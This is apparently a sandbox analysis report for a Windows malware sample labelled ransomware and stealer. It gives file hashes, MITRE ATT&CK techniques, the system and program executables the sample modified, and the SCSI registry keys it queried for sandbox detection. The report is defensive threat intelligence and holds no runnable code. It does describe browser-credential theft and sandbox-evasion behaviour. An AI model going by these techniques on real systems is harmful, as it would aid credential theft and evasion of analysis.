96a29296794c50e210bde7c05ea90a1e628cff64ec700ed214172cac4e4c38d6

Analysis

max time kernel
145s
max time network
149s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
09/06/2024, 09:02 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe
Size

712KB
MD5

5cb7112d86264587678a912e0892d430
SHA1

2e84d689dd4db798bdeeb73389be1f8b8765a7ab
SHA256

96a29296794c50e210bde7c05ea90a1e628cff64ec700ed214172cac4e4c38d6
SHA512

57d8164c7d6de63e1be8995916ffde43dcc1892a574ab8d6c6d29cb5c0665038bf18ab4b685b7b4f9ba44418a3aba96ccf44d8ae1ad7f5f6cfc1dbab96f8b654
SSDEEP

12288:MtOw6Ba5yndwCg6/xjPHFFBwpRDftD7IBUgbScDQCSkb6wjfRMVviOvf7sibN3AS:i6BEe1g6p7HF/w/ftDsBUiScD7WGfWVh

Score

7^/10

spyware stealer

Malware Config

Signatures

Executes dropped EXE 22 IoCs

pid	Process
4616	alg.exe
2068	DiagnosticsHub.StandardCollector.Service.exe
4896	fxssvc.exe
4744	elevation_service.exe
5052	elevation_service.exe
1036	maintenanceservice.exe
2356	msdtc.exe
3864	OSE.EXE
1756	PerceptionSimulationService.exe
3348	perfhost.exe
2504	locator.exe
1140	SensorDataService.exe
2180	snmptrap.exe
2560	spectrum.exe
3656	ssh-agent.exe
2088	TieringEngineService.exe
1744	AgentService.exe
5048	vds.exe
4316	vssvc.exe
5108	wbengine.exe
1600	WmiApSrv.exe
400	SearchIndexer.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Drops file in System32 directory 31 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWow64\perfhost.exe	2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe
File opened for modification	C:\Windows\system32\wbengine.exe	2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe
File opened for modification	C:\Windows\system32\msiexec.exe	DiagnosticsHub.StandardCollector.Service.exe
File opened for modification	C:\Windows\system32\locator.exe	2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe
File opened for modification	C:\Windows\System32\vds.exe	2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe
File opened for modification	C:\Windows\system32\SearchIndexer.exe	2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe
File opened for modification	C:\Windows\system32\SgrmBroker.exe	DiagnosticsHub.StandardCollector.Service.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Roaming\733521f2c8648821.bin	DiagnosticsHub.StandardCollector.Service.exe
File opened for modification	C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe	2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe
File opened for modification	C:\Windows\system32\dllhost.exe	DiagnosticsHub.StandardCollector.Service.exe
File opened for modification	C:\Windows\system32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe	2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe
File opened for modification	C:\Windows\system32\fxssvc.exe	2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe
File opened for modification	C:\Windows\system32\spectrum.exe	2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe
File opened for modification	C:\Windows\system32\vssvc.exe	2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe
File opened for modification	C:\Windows\System32\OpenSSH\ssh-agent.exe	2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe
File opened for modification	C:\Windows\system32\wbem\WmiApSrv.exe	2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe
File opened for modification	C:\Windows\system32\AppVClient.exe	DiagnosticsHub.StandardCollector.Service.exe
File opened for modification	C:\Windows\system32\fxssvc.exe	DiagnosticsHub.StandardCollector.Service.exe
File opened for modification	C:\Windows\system32\AgentService.exe	DiagnosticsHub.StandardCollector.Service.exe
File opened for modification	C:\Windows\system32\AppVClient.exe	2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe
File opened for modification	C:\Windows\System32\snmptrap.exe	2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe
File opened for modification	C:\Windows\system32\TieringEngineService.exe	2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe
File opened for modification	C:\Windows\System32\SensorDataService.exe	DiagnosticsHub.StandardCollector.Service.exe
File opened for modification	C:\Windows\System32\msdtc.exe	2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe
File opened for modification	C:\Windows\system32\MSDtc\MSDTC.LOG	msdtc.exe
File opened for modification	C:\Windows\System32\SensorDataService.exe	2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe
File opened for modification	C:\Windows\system32\AgentService.exe	2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe
File opened for modification	C:\Windows\System32\alg.exe	2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe
File opened for modification	C:\Windows\system32\dllhost.exe	2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe
File opened for modification	C:\Windows\system32\msiexec.exe	2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe
File opened for modification	C:\Windows\system32\SgrmBroker.exe	2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\jarsigner.exe	DiagnosticsHub.StandardCollector.Service.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe	DiagnosticsHub.StandardCollector.Service.exe
File opened for modification	C:\Program Files\Mozilla Firefox\pingsender.exe	2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe
File opened for modification	C:\Program Files\Mozilla Firefox\plugin-container.exe	2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe
File opened for modification	C:\Program Files (x86)\Google\Update\Install\{14DF0EF0-439C-4CF1-9E8A-D1E954BF645B}\chrome_installer.exe	2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\javac.exe	DiagnosticsHub.StandardCollector.Service.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\jp2launcher.exe	DiagnosticsHub.StandardCollector.Service.exe
File opened for modification	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	DiagnosticsHub.StandardCollector.Service.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\jarsigner.exe	2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\javadoc.exe	2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\xjc.exe	2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\pack200.exe	DiagnosticsHub.StandardCollector.Service.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\VSTO\10.0\VSTOInstaller.exe	2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\unpack200.exe	2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\klist.exe	DiagnosticsHub.StandardCollector.Service.exe
File opened for modification	C:\Program Files (x86)\Google\Update\Install\{14DF0EF0-439C-4CF1-9E8A-D1E954BF645B}\chrome_installer.exe	DiagnosticsHub.StandardCollector.Service.exe
File opened for modification	C:\Program Files (x86)\Internet Explorer\ieinstal.exe	DiagnosticsHub.StandardCollector.Service.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\javaws.exe	2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe	2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe
File opened for modification	C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe	2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\jstatd.exe	DiagnosticsHub.StandardCollector.Service.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\keytool.exe	DiagnosticsHub.StandardCollector.Service.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\unpack200.exe	DiagnosticsHub.StandardCollector.Service.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\unpack200.exe	2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe
File opened for modification	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\javah.exe	2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\jps.exe	2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\VSTO\10.0\VSTOInstaller.exe	DiagnosticsHub.StandardCollector.Service.exe
File opened for modification	C:\Program Files\Internet Explorer\ieinstal.exe	DiagnosticsHub.StandardCollector.Service.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\schemagen.exe	DiagnosticsHub.StandardCollector.Service.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\servertool.exe	DiagnosticsHub.StandardCollector.Service.exe
File opened for modification	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe	DiagnosticsHub.StandardCollector.Service.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe	2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\javapackager.exe	2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\ktab.exe	2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\jabswitch.exe	DiagnosticsHub.StandardCollector.Service.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\jsadebugd.exe	DiagnosticsHub.StandardCollector.Service.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\jabswitch.exe	DiagnosticsHub.StandardCollector.Service.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\idlj.exe	DiagnosticsHub.StandardCollector.Service.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\rmid.exe	DiagnosticsHub.StandardCollector.Service.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ink\ShapeCollector.exe	2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\110.0.5481.104\chrome_pwa_launcher.exe	2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\ktab.exe	2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\jjs.exe	2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe	DiagnosticsHub.StandardCollector.Service.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe	DiagnosticsHub.StandardCollector.Service.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\javaw.exe	DiagnosticsHub.StandardCollector.Service.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\vlc-cache-gen.exe	DiagnosticsHub.StandardCollector.Service.exe
File opened for modification	C:\Program Files (x86)\Google\Update\1.3.36.151\GoogleUpdate.exe	DiagnosticsHub.StandardCollector.Service.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\servertool.exe	2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe
File opened for modification	C:\Program Files (x86)\Common Files\Oracle\Java\javapath\javaws.exe	2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\klist.exe	DiagnosticsHub.StandardCollector.Service.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\java.exe	DiagnosticsHub.StandardCollector.Service.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\ktab.exe	DiagnosticsHub.StandardCollector.Service.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\tnameserv.exe	DiagnosticsHub.StandardCollector.Service.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\javac.exe	2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\tnameserv.exe	2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\orbd.exe	2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\setup.exe	DiagnosticsHub.StandardCollector.Service.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\jdeps.exe	DiagnosticsHub.StandardCollector.Service.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\jjs.exe	DiagnosticsHub.StandardCollector.Service.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe	DiagnosticsHub.StandardCollector.Service.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\java-rmi.exe	2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\policytool.exe	2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Drops file in Windows directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe	2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe
File opened for modification	C:\Windows\DtcInstall.log	msdtc.exe
File opened for modification	C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe	DiagnosticsHub.StandardCollector.Service.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 64 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	spectrum.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	SensorDataService.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\FriendlyName	spectrum.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C	spectrum.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\FriendlyName	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	SensorDataService.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\FriendlyName	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	spectrum.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\FriendlyName	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001	SensorDataService.exe
